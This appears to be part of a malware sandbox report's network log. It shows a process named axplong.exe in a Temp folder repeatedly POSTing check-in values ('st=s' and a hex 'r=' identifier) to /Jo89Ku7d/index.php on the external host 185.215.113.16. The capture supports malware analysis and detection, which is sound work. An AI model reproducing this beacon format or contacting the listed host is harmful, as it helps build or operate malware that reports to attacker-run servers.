Sep 26, 2024 15:42:23.345959902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	52338	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:23.457170963 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:24.193552017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:24.194499016 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:24.504070044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	52339	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:24.612999916 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:25.323458910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:25.324562073 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:25.556170940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	52340	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:25.675662994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:26.370754004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:26.371593952 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:26.597754002 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	52341	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:26.707528114 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:27.595855951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:27.597522974 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:27.964509010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	52343	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:28.098059893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:28.869976997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:28.873342991 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:29.109827995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	52344	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:29.222044945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:29.941618919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:29.944001913 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:30.217442036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	52345	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:30.332622051 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:31.184906006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:31.185894012 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:31.422466993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	52346	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:31.542525053 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:32.235276937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:32.236218929 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:32.463326931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	52347	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:32.581437111 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:33.301938057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:33.343888998 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:33.573101044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	52348	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:33.693254948 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:34.422604084 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:34.423326015 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:34.659630060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	52349	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:34.768619061 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:35.486648083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:35.487473965 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:35.716969967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	52350	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:35.836194992 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:36.668822050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:36.669954062 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:36.904921055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	52351	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:37.022066116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:37.758265018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
